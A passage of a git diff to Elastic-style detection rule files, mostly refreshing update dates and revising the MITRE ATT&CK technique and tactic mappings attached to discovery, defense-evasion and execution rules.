[rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_service_disabled_registry.toml b/rules_building_block/defense_evasion_service_disabled_registry.toml index c1f1d49dab7..504eedb76b9 100644 --- a/rules_building_block/defense_evasion_service_disabled_registry.toml +++ b/rules_building_block/defense_evasion_service_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -48,26 +48,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml index 9eb28e15955..1a9f0d9f598 100644 --- a/rules_building_block/defense_evasion_service_path_registry.toml +++ b/rules_building_block/defense_evasion_service_path_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -51,48 +51,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml index 5a13a3271d6..872bb66c215 100644 --- a/rules_building_block/defense_evasion_services_exe_path.toml +++ b/rules_building_block/defense_evasion_services_exe_path.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -48,48 +48,41 @@ process where event.type == "start" and process.name : "sc.exe" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/defense_evasion_unusual_process_path_wbem.toml b/rules_building_block/defense_evasion_unusual_process_path_wbem.toml index 90930db47e5..2a00fb024b7 100644 --- a/rules_building_block/defense_evasion_unusual_process_path_wbem.toml +++ b/rules_building_block/defense_evasion_unusual_process_path_wbem.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -55,14 +55,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_write_dac_access.toml b/rules_building_block/defense_evasion_write_dac_access.toml index ca738169f21..26796bd548b 100644 --- a/rules_building_block/defense_evasion_write_dac_access.toml +++ b/rules_building_block/defense_evasion_write_dac_access.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -63,19 +63,31 @@ host.os.type: "windows" and event.action : ("Directory Service Access" or "objec [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" + [[rule.threat.technique.subtechnique]] id = "T1222.001" name = "Windows File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules_building_block/discovery_generic_account_groups.toml b/rules_building_block/discovery_generic_account_groups.toml index eb8dadcd502..7c0ba29b8f0 100644 --- a/rules_building_block/discovery_generic_account_groups.toml +++ b/rules_building_block/discovery_generic_account_groups.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -64,10 +64,17 @@ and not process.parent.name : "LTSVC.exe" and not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" @@ -78,11 +85,11 @@ id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -93,15 +100,12 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_hosts_file_access.toml b/rules_building_block/discovery_hosts_file_access.toml index d371aaa1a97..a63b5a271f0 100644 --- a/rules_building_block/discovery_hosts_file_access.toml +++ b/rules_building_block/discovery_hosts_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2024/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -42,6 +42,11 @@ not ?process.working_directory in ("/opt/SolarWinds/Agent/bin/Plugins/SCM", "/op [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" diff --git a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml index 981adb13784..fbf32904d63 100644 --- a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml +++ b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/12" integration = ["auditd_manager"] maturity = "production" -updated_date = "2024/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -70,11 +70,15 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml index 3df1dd8bd91..341d4d6b255 100644 --- a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml +++ b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -59,16 +59,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules_building_block/discovery_linux_modprobe_enumeration.toml b/rules_building_block/discovery_linux_modprobe_enumeration.toml index eee45ca1da0..0e0adaa499e 100644 --- a/rules_building_block/discovery_linux_modprobe_enumeration.toml +++ b/rules_building_block/discovery_linux_modprobe_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -77,11 +77,33 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_sysctl_enumeration.toml b/rules_building_block/discovery_linux_sysctl_enumeration.toml index 332fd65a447..061062d0d88 100644 --- a/rules_building_block/discovery_linux_sysctl_enumeration.toml +++ b/rules_building_block/discovery_linux_sysctl_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,6 +79,36 @@ id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_net_share_discovery_winlog.toml b/rules_building_block/discovery_net_share_discovery_winlog.toml index 4d83aa90687..395fa517e79 100644 --- a/rules_building_block/discovery_net_share_discovery_winlog.toml +++ b/rules_building_block/discovery_net_share_discovery_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -44,26 +44,44 @@ sequence by user.name, source.port, source.ip with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1039" name = "Data from Network Shared Drive" reference = "https://attack.mitre.org/techniques/T1039/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules_building_block/discovery_of_domain_groups.toml b/rules_building_block/discovery_of_domain_groups.toml index c64491dcc33..5a7e4e36c5f 100644 --- a/rules_building_block/discovery_of_domain_groups.toml +++ b/rules_building_block/discovery_of_domain_groups.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -44,14 +44,18 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_posh_generic.toml b/rules_building_block/discovery_posh_generic.toml index d25af55f2b8..f6b29067589 100644 --- a/rules_building_block/discovery_posh_generic.toml +++ b/rules_building_block/discovery_posh_generic.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -201,6 +201,7 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" @@ -211,6 +212,11 @@ id = "T1012" name = "Query Registry" reference = "https://attack.mitre.org/techniques/T1012/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" @@ -222,9 +228,19 @@ name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.001" +name = "Local Groups" +reference = "https://attack.mitre.org/techniques/T1069/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1082" @@ -240,6 +256,7 @@ reference = "https://attack.mitre.org/techniques/T1083/" id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -250,7 +267,6 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" @@ -270,37 +286,36 @@ reference = "https://attack.mitre.org/techniques/T1482/" id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" + [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" - [[rule.threat.technique]] id = "T1615" name = "Group Policy Discovery" reference = "https://attack.mitre.org/techniques/T1615/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/discovery_posh_password_policy.toml b/rules_building_block/discovery_posh_password_policy.toml index fe12f739745..c0d2b23ed0b 100644 --- a/rules_building_block/discovery_posh_password_policy.toml +++ b/rules_building_block/discovery_posh_password_policy.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,34 +142,52 @@ not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.006" +name = "Group Policy Preferences" +reference = "https://attack.mitre.org/techniques/T1552/006/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/discovery_potential_memory_seeking_activity.toml b/rules_building_block/discovery_potential_memory_seeking_activity.toml index 1296b79194d..2640548bf2c 100644 --- a/rules_building_block/discovery_potential_memory_seeking_activity.toml +++ b/rules_building_block/discovery_potential_memory_seeking_activity.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -70,3 +70,16 @@ reference = "https://attack.mitre.org/techniques/T1057/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml index 49272de507f..8244aa0061e 100644 --- a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml +++ b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -93,6 +93,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" @@ -103,9 +104,17 @@ id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_system_network_connections.toml b/rules_building_block/discovery_system_network_connections.toml index b226cb4c1aa..0493b25927c 100644 --- a/rules_building_block/discovery_system_network_connections.toml +++ b/rules_building_block/discovery_system_network_connections.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -45,6 +45,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" @@ -54,7 +59,6 @@ reference = "https://attack.mitre.org/techniques/T1049/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_system_service_discovery.toml b/rules_building_block/discovery_system_service_discovery.toml index 4810cc175fd..335cba1ca7b 100644 --- a/rules_building_block/discovery_system_service_discovery.toml +++ b/rules_building_block/discovery_system_service_discovery.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/01/24" integration = ["windows", "endpoint", "system"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -70,14 +70,23 @@ process where host.os.type == "windows" and event.type == "start" and process.pa [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" reference = "https://attack.mitre.org/techniques/T1007/" +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_system_time_discovery.toml b/rules_building_block/discovery_system_time_discovery.toml index 4966907e28e..10d34aea977 100644 --- a/rules_building_block/discovery_system_time_discovery.toml +++ b/rules_building_block/discovery_system_time_discovery.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/01/24" integration = ["windows", "endpoint", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -54,14 +54,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1124" name = "System Time Discovery" reference = "https://attack.mitre.org/techniques/T1124/" +[[rule.threat.technique]] +id = "T1614" +name = "System Location Discovery" +reference = "https://attack.mitre.org/techniques/T1614/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_win_network_connections.toml b/rules_building_block/discovery_win_network_connections.toml index dc1f9d25751..96787e5026b 100644 --- a/rules_building_block/discovery_win_network_connections.toml +++ b/rules_building_block/discovery_win_network_connections.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -52,6 +52,12 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" @@ -62,9 +68,12 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_windows_system_information_discovery.toml b/rules_building_block/discovery_windows_system_information_discovery.toml index c2deaf4223a..a1f44fc1912 100644 --- a/rules_building_block/discovery_windows_system_information_discovery.toml +++ b/rules_building_block/discovery_windows_system_information_discovery.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/06" integration = ["windows", "endpoint", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -62,14 +62,36 @@ process.parent.executable : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/execution_github_new_event_action_for_pat.toml b/rules_building_block/execution_github_new_event_action_for_pat.toml index 481941c1220..948e55f7d53 100644 --- a/rules_building_block/execution_github_new_event_action_for_pat.toml +++ b/rules_building_block/execution_github_new_event_action_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -37,17 +37,52 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access 